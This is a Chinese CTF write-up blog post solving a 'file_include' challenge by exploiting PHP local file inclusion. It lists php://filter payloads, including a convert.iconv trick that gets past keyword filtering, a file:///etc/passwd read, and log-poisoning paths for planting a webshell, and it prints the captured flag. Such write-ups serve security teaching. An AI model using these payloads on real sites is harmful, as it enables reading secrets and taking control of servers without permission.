攻防世界-file_include(convert.iconv的使用)

最新推荐文章于 2024-07-21 14:30:49 发布
最新推荐文章于 2024-07-21 14:30:49 发布
阅读量1.3k 收藏 11
点赞数 4
分类专栏: PHP CTF web 文章标签: PHP伪协议 文件包含 iconv函数 转换过滤器 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myon5/article/details/130188333
版权
web 同时被 3 个专栏收录
180 篇文章 22 订阅
订阅专栏
CTF
113 篇文章 19 订阅
订阅专栏
PHP
56 篇文章 1 订阅
订阅专栏

 

代码审计,存在文件包含,直接上伪协议

发现不行,应该是存在字符过滤 

知识盲区:

1.file://协议,需要填写绝对路径,只能读取txt文件,后面直接跟绝对路径。

file:///etc/passwd

2.php://filter

(1)String Filters(字符串过滤器)

php://filter/string.rot13/resource=flag.php //读出以后利用ROT13解码即可

php://filter/string.toupper/resource=flag.php //转大写

php://filter/string.tolower/resource=flag.php //转小写

php://filter/string.strip_tags/resource=flag.php //php标签里所有东西都会被去除,html只有标签会被去除,里面的文字不会删除

(2)Conversion Filters(转换过滤器)

php://filter/convert.base64-encode/resource=flag.php //base64加密读出

php://filter/convert.quoted-printable-encode/resource=flag.php

convert.iconv.*:

用法:

convert.iconv.<input-encoding>.<output-encoding>
or
convert.iconv.<input-encoding>/<output-encoding>

<input-encoding>和<output-encoding> 就是编码方式,有如下几种:

UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
EUC-JP*
SJIS*
eucJP-win*
SJIS-win*

payload:

?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=/var/www/html/flag.php

(3)Compression Filters(压缩过滤器)

payload:

php://filter/zlib.deflate|zlib.inflate/resource=flag.php        //zlib.deflate(压缩)|zlib.inflate(解压)
or
php://filter/bzip2.compress|bzip2.decompress/resource=flag.php   //bzip2.compress(压缩)|bzip2.decompress(解压)

3.包含日志文件,抓包写入一句话木马,进行getshell 日志文件路径:

(1)/var/log/nginx/access.log

(2)/var/log/apache2/access_log

4、iconv函数

完成各种字符集间的转换

$string = "XXXX";

iconv("utf8","gbk",$string)  //将字符串string 编码由utf8转变成gbk;

直接访问check.php这个文件里面的内容

/?filename=php://filter/convert.iconv.utf8.utf16/resource=check.php

 如果使用括号里面的编码参数会直接提示do not hack!

查看flag.php

注意伪协议里面的编码使用:/?filename=php://filter/convert.iconv.utf8.utf16/resource=flag.php

 $flag=cyberpeace{97c7789160615b28e7bb02fc233c4080}

Myon⁶
关注
专栏目录
【网络安全 | CTF】攻防世界 fileinclude 解题详析(php伪协议
等风来
07-31 4244
由于index.php在/var/www/html目录下,而flag.php与index.php同为php文件,故猜想flag.php也在该目录下。因此解题思路为:利用php伪协议,构造language参数,来读取该目录下的flag.php文件。,即此处存在文件包含
【网络安全 | CTF】攻防世界 file_include 解题详析(php伪协议+convert转换过滤器
等风来
07-31 4983
也就是说我们修改POC之后得到的check.php中的内容其实是逻辑判断代码,与flag无关。由代码审计可知,可通过filename参数构造POC,来读取check.php。回显的代码使用了正则表达式来匹配指定的字符串,如果输入中包含了。故猜想flag在flag.php中,修改POC即可得到flag。该题涉及到 convert转换过滤器。中的任何一个字符串,就会关闭脚本。猜测关键字被过滤,怎么办呢?题目描述:怎么读取文件呢?对于本题,将初始POC。
CTF-文件上传(文件包含)总结
最新发布
2302_78903258的博客
07-21 1770
攻击者在入侵了一个网站后,通常会将这些asp或php后门文件与网站服务器web目录下正常的网页文件混在一起,然后使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)。php文件包含机制是将已经包含的文件与文件的真实路径放进哈希表中,正常情况下,PHP会将用户输入的文件名进行resolve,转换成标准的绝对路径,这个转换的过程会将…来实现的,它会检查左侧的表达式是否为 null,如果是则使用右侧的默认值。以及 fd 怎么办呢?
攻防世界file_include
小缪的博客
06-10 2961
这种漏洞通常存在于代码中,允许攻击者将未经过滤的输入作为参数传递给文件包含函数(如include()、require()等),从而加载恶意脚本或者敏感文件到服务器上,并进一步攻击系统。这种漏洞通常发生在应用程序没有对用户输入进行过滤的情况下,接受用户的输入来指定文件名或者路径,并将其传递给包含函数的时候。2.远程文件包含(RFI):攻击者通过构造一个URL链接,将远程服务器上的恶意脚本地址传递给包含函数,从而导致远程服务器上的脚本被执行。对于指定过滤器的更多信息,请参考该函数的手册页。该过滤器不支持参数,
攻防世界-file_include
m0_49025459的博客
12-18 7290
对于我这种编码能力差的小白,我直接就是一个一个手测,然后呢,发现?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=check.php好使,但是没有flag。读题我们发现我们需要去读取./check.php中的数据,我们尝试用伪协议进行读取,接下来构造payload。文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。通过阅读php代码,我们明显的可以发现,这个一个文件包含的类型题。
攻防世界-file_include-详解
chinese_cabbage0的博客
02-04 1858
主要是这个题目的解题过程和原理,可以帮助大家学习文件包含漏洞
攻防世界file_include
m0_74979597的博客
09-13 1733
这个参数filename,,用户可以通过这个参数找到漏洞;1.当我使用filename=
file_include(攻防世界)
m0_56107268的博客
11-14 7552
php转化器的学习
攻防世界题目练习——Web难度1(二)_&lt; php highlight_file(__file__); include(&quot;(1)
2301_79054215的博客
04-20 905
是Linux中的一个特殊变量,它代表了当前的字段分隔符,它的默认值是空格、制表符和换行符,当输入命令时,会以空格、制表符或换行符作为分隔符,将输入的内容分割成不同的字段,每个字段将作为命令的一个参数进行解析和执行。现在我们知道了waf函数过滤的有哪些字符或字符串,我们要避免直接输入这些关键词,但是有些字符在我们查找flag的过程中不可避免地会用到,因此我们对它们进行绕过,绕过的方式有如下几种。函数进行了匹配,第一个参数是给定的用来模式匹配的正则表达式,第二个参数是输入的要匹配的字符串。
渗透测试面试题
热门推荐
千寻的博客
12-31 11万+
渗透测试面试题 一.思路流程 1.信息收集 服务器的相关信息(真实ip,系统类型,版本,开放端口,WAF等) 网站指纹识别(包括,cms,cdn,证书等),dns记录 whois信息,姓名,备案,邮箱,电话反查(邮箱丢社工库,社工准备等) 子域名收集,旁站,C段等 google hacking针对化搜索,pdf文件,中间件版本,弱口令扫描等 扫描网站目录结构,爆后台,网站banner,测试文件,...
攻防世界-web-file_include
MateSnake的博客
05-12 537
攻防世界-web-file_include
攻防世界---fileinclude
m0_72447684的博客
10-11 1223
攻防世界---fileinclude
攻防世界-fileinclude
2301_79858466的博客
07-21 955
💡 convert.base64-encode/convert.base64-decode是转换过滤器属于read的参数,💡 相当于base64_encode()和 base64_decode(),作用是base64 编码解码。💡 read= 该参数可选。可以设定一个或多个过滤器名称,以 管道符(|)分隔。两个链的过滤器> 任何没有以 read= 或 write= 作前缀的筛选器列表会视情。💡 resource= 必须项。💡 write= 该参数可选。
攻防世界 -- fileinclude
weixin_48031371的博客
09-14 3343
攻防世界 -- fileinclude
攻防世界file_includePHP伪协议+过滤器
2302_79800344的博客
04-01 591
打开题目环境:进行PHP代码审计,发现这是一个文件包含漏洞。我们尝试利用PHP伪协议中的 php://filter来读取 check.php 中的内容。构造payload 并提交:发现payload被过滤掉了,我们就需要尝试使用不同的转换器。PHP各类转换器首先尝试 字符串过滤器--失败。然后尝试转换过滤器,前四种转换过滤器均失效,最后尝试 convent.iconv转换器。利用 Burpsuite intruder模式中的集束炸弹 cluster bomb 对其进行暴力破解:再将该PHP支持的字符编码导入
攻防世界fileinclude
……
09-13 7675
攻防世界文件包含题目
php://filter/convert.iconv.UCS-4LE.UCS-4BE|hp?<e@%20p(lavOP_$s[TS]pm1>?;)/resource=s1mple.php的作用
05-29
很抱歉,这看起来像是一个恶意的代码注入问题,而我不会提供与黑客攻击或非法行为相关的信息或建议。我建议您遵守合法的网络安全实践和道德准则。 一般来说,`php://filter`协议是一种过滤器,用于在读取或写入流的同时对其进行过滤,例如,可以使用`php://filter`协议来对读取的文件进行解压缩、加密、解密等处理。而`convert.iconv`则是`php://filter`协议中的一个过滤器,用于对流进行字符集转换。 根据您给出的代码片段,这里使用了`php://filter`协议以及`convert.iconv`过滤器对一个名为`s1mple.php`的资源进行字符集转换,并将转换后的结果作为输入传递给一个PHP脚本。但是,代码中的其他部分并没有给出完整的语境,因此无法确定这段代码的真实意图。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Myon⁶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值